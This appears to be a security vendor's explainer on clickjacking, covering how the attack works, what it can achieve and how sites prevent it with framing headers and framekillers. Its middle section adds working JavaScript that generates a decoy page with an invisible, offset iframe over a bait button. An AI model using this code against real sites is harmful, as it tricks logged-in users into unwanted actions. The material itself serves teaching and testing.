What is Clickjacking?
Clickjacking Defined, Explained, and Explored
Clickjacking Defined
Clickjacking is an attack in which a user is tricked into clicking something other than what they see. The attacker loads a legitimate page in a transparent frame on top of a decoy page, so a click on a harmless-looking button or link is actually delivered to a hidden control on the target site, almost always for malicious purposes. Clickjacking is also known as UI redressing or an IFRAME overlay. In many cases the user never realizes that their clicks are not going where they appear to go, and that single misdirected click can open up a number of vulnerabilities.
The Impact of Clickjacking
The attacker has several ways to use the hijacked clicks for their own gain. A common form of clickjacking overlays invisible input fields on a website's login form. The user assumes they are typing into the usual username and password fields, but the keystrokes land in fields the attacker has placed over the UI. Attackers target passwords, credit card numbers and any other valuable data they can exploit.
An attacker may also use the hijacked clicks to trigger a malware download, or to gain an initial foothold in vital systems as the starting point for an advanced persistent threat (APT). This spells trouble for any organization that relies on protecting sensitive data and intellectual property.
Clickjacking Examples
Links and buttons can be hidden under media so that a click triggers a particular action, such as liking a Facebook page or placing an order on Amazon. Certain conditions usually have to hold for the attack to succeed, most importantly that the user is already logged in to the target site: the hidden frame is loaded with the user's own session cookies, so the click is performed with the user's authority.
If the user is tricked into downloading something onto their computer, they then have to deal with a compromised machine. In the best case they can remove the malware with an anti-virus scan; in the worst case they need to reformat the computer and reinstall the operating system.
Clickjacking can also turn system features on and off, for example by getting the user to click "Allow" on the browser permission prompt that a page's JavaScript raises to request access to the microphone and camera. It can likewise obtain location data from the computer or other details that facilitate future crimes.
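The following is an added example, not code from the original page, showing how the overlay described above is put together: the attacker's decoy page stacks a transparent iframe of the target site over a visible bait button, offset so that the sensitive control on the target page sits exactly under the bait. The hostname target.example, the pixel coordinates and the button size are all assumptions made for the illustration.

```javascript
// Added example (not from the original page): mechanics of a clickjacking
// (UI redress) page. The attacker serves a decoy page and stacks a transparent
// iframe of the target site over it, offset so that the sensitive button on
// the target page sits exactly under the visible bait button.
// target.example, the coordinates and the button size are hypothetical.

const BUTTON = { w: 120, h: 40 }; // assumed size of the bait and the hidden target button

// Offset that moves the target page's button under the bait button.
function frameOffset(targetButton, baitButton) {
  return { x: baitButton.x - targetButton.x, y: baitButton.y - targetButton.y };
}

// Build the attacker's decoy page as an HTML string.
//   targetUrl    : page on the victim site whose button is to be clicked
//   targetButton : top-left of that button inside the target page (px)
//   baitButton   : top-left of the visible bait on the decoy page (px)
function buildDecoyPage(targetUrl, targetButton, baitButton) {
  const off = frameOffset(targetButton, baitButton);
  return `<!doctype html>
<html><head><style>
  body { margin: 0; }
  #bait { position: absolute; left: ${baitButton.x}px; top: ${baitButton.y}px;
          width: ${BUTTON.w}px; height: ${BUTTON.h}px; z-index: 1; }
  #target { position: absolute; left: ${off.x}px; top: ${off.y}px;
            width: 1200px; height: 900px; border: 0;
            opacity: 0;  /* invisible, but still receives pointer events */
            z-index: 2; } /* stacked above the bait, so the click lands here */
</style></head><body>
  <button id="bait">Claim your prize</button>
  <iframe id="target" src="${targetUrl}"></iframe>
</body></html>`;
}

// Translate a click on the decoy page into the target page's coordinate
// system and report whether it hits the hidden button. This is the arithmetic
// an attacker tunes the offsets against, and the same check a tester can use
// to confirm that a proof-of-concept page is lined up correctly.
function clickLandsOnTarget(click, targetButton, baitButton) {
  const off = frameOffset(targetButton, baitButton);
  const tx = click.x - off.x;
  const ty = click.y - off.y;
  return tx >= targetButton.x && tx < targetButton.x + BUTTON.w &&
         ty >= targetButton.y && ty < targetButton.y + BUTTON.h;
}
```

The iframe request carries the victim's own cookies, which is why the user has to be logged in for the hidden click to do anything. A side effect worth knowing: session cookies marked SameSite=Lax or SameSite=Strict are not sent on a cross-site iframe request, so the hidden page loads without a session and the attack fails.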
Clickjacking Prevention
Thankfully, there are several methods that prevent clickjacking before users are put at risk.
- Prevent framing from other domains: Stop an attacker from placing your popular content under an invisible overlay on their page. Send the Content-Security-Policy header with a frame-ancestors directive (and the older X-Frame-Options header for browsers that do not support it) so that the browser refuses to render the page inside a frame unless the framing page is on an allowed origin, by default the same origin as the website.
- Moving the current frame to the top: Frame-busting code checks whether the page is the topmost window and, if it is not, navigates the top window to the page itself, so the page cannot remain embedded underneath hidden elements.
- Client-side anti-clickjacking add-ons: Some web browsers, such as Firefox, have add-ons (NoScript, for example) that stop scripts from running on a webpage and can warn about hidden frames. This prevents the attacker's script from executing, but it only protects users who have installed the add-on.
- Add a framekiller to the website: A framekiller is a short piece of JavaScript (a pattern, not a built-in function) that detects when the page has been loaded inside an iFrame and breaks out of it. Framekillers can be defeated, for example by an iframe sandbox attribute that blocks top-level navigation, so treat them as a supplement to the framing headers rather than a replacement.
- Use a robust cybersecurity solution: A comprehensive cybersecurity solution, such as Forcepoint, considers multiple attack vectors when securing your website and systems from hackers.
Clickjacking is an intrusive and damaging attack method that can lead to many serious consequences. Your company needs a way to proactively stop this attack from turning your website or content into a dangerous environment for users.